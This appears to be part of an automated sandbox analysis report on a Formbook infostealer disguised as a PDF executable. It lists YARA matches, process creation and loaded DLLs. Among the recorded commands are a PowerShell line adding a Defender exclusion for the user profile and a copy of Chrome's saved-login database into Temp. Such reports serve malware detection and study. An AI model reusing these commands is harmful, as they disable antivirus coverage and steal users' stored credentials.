Source: 00000022.00000002.2477860458.0000000002CC0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Diceloader_15eeb7b9 reference_sample = a1202df600d11ad2c61050e7ba33701c22c2771b676f54edd1846ef418bea746, os = windows, severity = x86, creation_date = 2021-04-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Diceloader, fingerprint = 4cc70bec5d241c6f84010fbfe2eafbc6ec6d753df2bb3f52d9498b54b11fc8cb, id = 15eeb7b9-311f-477b-8ae1-b8f689a154b7, last_modified = 2021-08-23
Source: 00000022.00000002.2477860458.0000000002CC0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000022.00000002.2477860458.0000000002CC0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000022.00000002.2477860458.0000000002CC0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000000.00000002.2123708358.0000029D3B800000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Diceloader_15eeb7b9 reference_sample = a1202df600d11ad2c61050e7ba33701c22c2771b676f54edd1846ef418bea746, os = windows, severity = x86, creation_date = 2021-04-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Diceloader, fingerprint = 4cc70bec5d241c6f84010fbfe2eafbc6ec6d753df2bb3f52d9498b54b11fc8cb, id = 15eeb7b9-311f-477b-8ae1-b8f689a154b7, last_modified = 2021-08-23
Source: 00000000.00000002.2123708358.0000029D3B800000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000000.00000002.2123708358.0000029D3B800000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000000.00000002.2123708358.0000029D3B800000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0000000D.00000002.2290187771.0000026544400000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Diceloader_15eeb7b9 reference_sample = a1202df600d11ad2c61050e7ba33701c22c2771b676f54edd1846ef418bea746, os = windows, severity = x86, creation_date = 2021-04-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Diceloader, fingerprint = 4cc70bec5d241c6f84010fbfe2eafbc6ec6d753df2bb3f52d9498b54b11fc8cb, id = 15eeb7b9-311f-477b-8ae1-b8f689a154b7, last_modified = 2021-08-23
Source: 0000000D.00000002.2290187771.0000026544400000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 0000000D.00000002.2290187771.0000026544400000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0000000D.00000002.2290187771.0000026544400000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: Process Memory Space: 101 2043 5770 pdf.exe PID: 2720, type: MEMORYSTR	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: Process Memory Space: csc.exe PID: 6324, type: MEMORYSTR	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: Process Memory Space: explorer.exe PID: 4004, type: MEMORYSTR	Matched rule: ironshell_php author = Neo23x0 Yara BRG + customization by Stefan -dfate- Molls, description = Semi-Auto-generated - file ironshell.php.txt, hash = 8bfa2eeb8a3ff6afc619258e39fded56
Source: Process Memory Space: ipconfig.exe PID: 6968, type: MEMORYSTR	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: Process Memory Space: 101 2043 5770 pdf.exe PID: 6512, type: MEMORYSTR	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: Process Memory Space: calc.exe PID: 2300, type: MEMORYSTR	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: Process Memory Space: svchost.exe PID: 6272, type: MEMORYSTR	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: Process Memory Space: cmmon32.exe PID: 5376, type: MEMORYSTR	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: Process Memory Space: wmplayer.exe PID: 6672, type: MEMORYSTR	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: Process Memory Space: raserver.exe PID: 1088, type: MEMORYSTR	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@1068/19@14/1

Source: C:\Users\user\Desktop\101 2043 5770 pdf.exe

0_2_00007FF7D7862060

Source: C:\Users\user\Desktop\101 2043 5770 pdf.exe

File created: C:\Users\user\101 2043 5770 pdf.exe

Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Mutant created: NULL
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3992:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5376:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6928:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6996:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2720:120:WilError_03

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_5lxxqwri.2qj.ps1

Jump to behavior

Source: 101 2043 5770 pdf.exe

Static file information: TRID: Win64 Executable GUI Net Framework (217006/5) 45.39%

Source: C:\Users\user\Desktop\101 2043 5770 pdf.exe

File read: C:\Users\user\Desktop\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\101 2043 5770 pdf.exe

Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: 101 2043 5770 pdf.exe	ReversingLabs: Detection: 31%
Source: 101 2043 5770 pdf.exe	Virustotal: Detection: 16%

Source: C:\Users\user\Desktop\101 2043 5770 pdf.exe

File read: C:\Users\user\Desktop\101 2043 5770 pdf.exe

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\101 2043 5770 pdf.exe "C:\Users\user\Desktop\101 2043 5770 pdf.exe"
Source: C:\Users\user\Desktop\101 2043 5770 pdf.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\101 2043 5770 pdf.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath $env:UserProfile
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\101 2043 5770 pdf.exe	Process created: C:\Program Files (x86)\Windows Media Player\wmplayer.exe "C:\Program Files (x86)\Windows Media Player\wmplayer.exe"
Source: C:\Users\user\Desktop\101 2043 5770 pdf.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe"
Source: C:\Windows\explorer.exe	Process created: C:\Windows\SysWOW64\ipconfig.exe "C:\Windows\SysWOW64\ipconfig.exe"
Source: C:\Windows\SysWOW64\ipconfig.exe	Process created: C:\Windows\SysWOW64\cmd.exe /c copy "C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data" "C:\Users\user\AppData\Local\Temp\DB1" /V
Source: C:\Windows\explorer.exe	Process created: C:\Users\user\101 2043 5770 pdf.exe "C:\Users\user\101 2043 5770 pdf.exe"
Source: C:\Users\user\101 2043 5770 pdf.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\101 2043 5770 pdf.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath $env:UserProfile
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\101 2043 5770 pdf.exe	Process created: C:\Windows\System32\calc.exe "C:\Windows\System32\calc.exe"
Source: C:\Users\user\101 2043 5770 pdf.exe	Process created: C:\Windows\regedit.exe "C:\Windows\regedit.exe"
Source: C:\Users\user\101 2043 5770 pdf.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe"
Source: C:\Users\user\101 2043 5770 pdf.exe	Process created: C:\Windows\System32\svchost.exe "C:\Windows\System32\svchost.exe"
Source: C:\Users\user\101 2043 5770 pdf.exe	Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe "C:\Program Files (x86)\Internet Explorer\iexplore.exe"
Source: C:\Windows\explorer.exe	Process created: C:\Windows\SysWOW64\cmmon32.exe "C:\Windows\SysWOW64\cmmon32.exe"
Source: C:\Windows\explorer.exe	Process created: C:\Users\user\101 2043 5770 pdf.exe "C:\Users\user\101 2043 5770 pdf.exe"
Source: C:\Windows\SysWOW64\ipconfig.exe	Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
Source: C:\Users\user\101 2043 5770 pdf.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath $env:UserProfile
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\101 2043 5770 pdf.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe"
Source: C:\Users\user\101 2043 5770 pdf.exe	Process created: C:\Program Files (x86)\Windows Media Player\wmplayer.exe "C:\Program Files (x86)\Windows Media Player\wmplayer.exe"
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe	Process created: C:\Windows\SysWOW64\raserver.exe "C:\Windows\SysWOW64\raserver.exe"
Source: C:\Users\user\Desktop\101 2043 5770 pdf.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath $env:UserProfile	Jump to behavior
Source: C:\Users\user\Desktop\101 2043 5770 pdf.exe	Process created: C:\Program Files (x86)\Windows Media Player\wmplayer.exe "C:\Program Files (x86)\Windows Media Player\wmplayer.exe"	Jump to behavior
Source: C:\Users\user\Desktop\101 2043 5770 pdf.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe"	Jump to behavior
Source: C:\Windows\explorer.exe	Process created: C:\Windows\SysWOW64\ipconfig.exe "C:\Windows\SysWOW64\ipconfig.exe"	Jump to behavior
Source: C:\Windows\explorer.exe	Process created: C:\Users\user\101 2043 5770 pdf.exe "C:\Users\user\101 2043 5770 pdf.exe"	Jump to behavior
Source: C:\Windows\explorer.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1	Jump to behavior
Source: C:\Windows\explorer.exe	Process created: C:\Users\user\101 2043 5770 pdf.exe "C:\Users\user\101 2043 5770 pdf.exe"	Jump to behavior
Source: C:\Windows\SysWOW64\ipconfig.exe	Process created: C:\Windows\SysWOW64\cmd.exe /c copy "C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data" "C:\Users\user\AppData\Local\Temp\DB1" /V	Jump to behavior
Source: C:\Windows\SysWOW64\ipconfig.exe	Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"	Jump to behavior
Source: C:\Users\user\101 2043 5770 pdf.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath $env:UserProfile	Jump to behavior
Source: C:\Users\user\101 2043 5770 pdf.exe	Process created: C:\Windows\System32\calc.exe "C:\Windows\System32\calc.exe"	Jump to behavior
Source: C:\Users\user\101 2043 5770 pdf.exe	Process created: C:\Windows\regedit.exe "C:\Windows\regedit.exe"	Jump to behavior
Source: C:\Users\user\101 2043 5770 pdf.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe"	Jump to behavior
Source: C:\Users\user\101 2043 5770 pdf.exe	Process created: C:\Windows\System32\svchost.exe "C:\Windows\System32\svchost.exe"	Jump to behavior
Source: C:\Users\user\101 2043 5770 pdf.exe	Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe "C:\Program Files (x86)\Internet Explorer\iexplore.exe"	Jump to behavior
Source: C:\Users\user\101 2043 5770 pdf.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath $env:UserProfile
Source: C:\Users\user\101 2043 5770 pdf.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe"
Source: C:\Users\user\101 2043 5770 pdf.exe	Process created: C:\Program Files (x86)\Windows Media Player\wmplayer.exe "C:\Program Files (x86)\Windows Media Player\wmplayer.exe"
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe	Process created: C:\Windows\SysWOW64\raserver.exe "C:\Windows\SysWOW64\raserver.exe"

Source: C:\Users\user\Desktop\101 2043 5770 pdf.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\101 2043 5770 pdf.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\101 2043 5770 pdf.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\101 2043 5770 pdf.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\101 2043 5770 pdf.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\101 2043 5770 pdf.exe	Section loaded: icu.dll	Jump to behavior
Source: C:\Users\user\Desktop\101 2043 5770 pdf.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\Desktop\101 2043 5770 pdf.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\Desktop\101 2043 5770 pdf.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\Desktop\101 2043 5770 pdf.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\101 2043 5770 pdf.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\101 2043 5770 pdf.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\101 2043 5770 pdf.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\Desktop\101 2043 5770 pdf.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\101 2043 5770 pdf.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\101 2043 5770 pdf.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\Desktop\101 2043 5770 pdf.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\Desktop\101 2043 5770 pdf.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\Desktop\101 2043 5770 pdf.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\101 2043 5770 pdf.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\Desktop\101 2043 5770 pdf.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\101 2043 5770 pdf.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: microsoft.management.infrastructure.native.unmanaged.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: miutils.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wmidcom.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: windows.cloudstore.schema.shell.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: windows.internal.shell.broker.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: vcruntime140_1.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: vcruntime140.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: msvcp140.dll	Jump to behavior
Source: C:\Windows\SysWOW64\ipconfig.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\ipconfig.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Windows\SysWOW64\ipconfig.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Windows\SysWOW64\ipconfig.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\ipconfig.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\SysWOW64\ipconfig.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\ipconfig.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\ipconfig.exe	Section loaded: ieframe.dll	Jump to behavior
Source: C:\Windows\SysWOW64\ipconfig.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\ipconfig.exe	Section loaded: netapi32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\ipconfig.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\ipconfig.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\ipconfig.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\ipconfig.exe	Section loaded: wkscli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\ipconfig.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\ipconfig.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\ipconfig.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\ipconfig.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\ipconfig.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\ipconfig.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\ipconfig.exe	Section loaded: mlang.dll	Jump to behavior
Source: C:\Windows\SysWOW64\ipconfig.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\SysWOW64\ipconfig.exe	Section loaded: winsqlite3.dll	Jump to behavior
Source: C:\Windows\SysWOW64\ipconfig.exe	Section loaded: vaultcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\ipconfig.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\SysWOW64\ipconfig.exe	Section loaded: windowscodecs.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\101 2043 5770 pdf.exe	Section loaded: apphelp.dll	Jump to behavior
